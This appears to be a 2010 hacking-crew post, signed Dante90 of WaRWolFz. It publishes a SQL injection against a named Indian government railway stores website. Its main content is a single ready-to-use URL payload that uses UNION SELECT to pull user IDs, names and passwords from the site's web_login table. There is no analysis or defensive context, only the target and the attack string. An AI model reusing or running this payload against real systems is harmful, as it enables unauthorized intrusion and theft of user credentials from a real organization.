######################################################################################
# Author/s: Dante90, WaRWolFz Crew                                                   #
# Target: http://www.stores.southernrailway.gov.in/                                  #
# Web: www.warwolfz.org                                                              #
# Vulnerability: SQL Injection                                                       #
######################################################################################

[code]
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(uid,CHAR(32,58,32),name,CHAR(32,58,32),pwd),CONCAT_WS(CHAR(32,58,32),sl,uid,pwd,name,CHAR(124,32)),5,6,7 FROM web_login--
[/code]

Dante90


#WaRWolFz 2010.05.12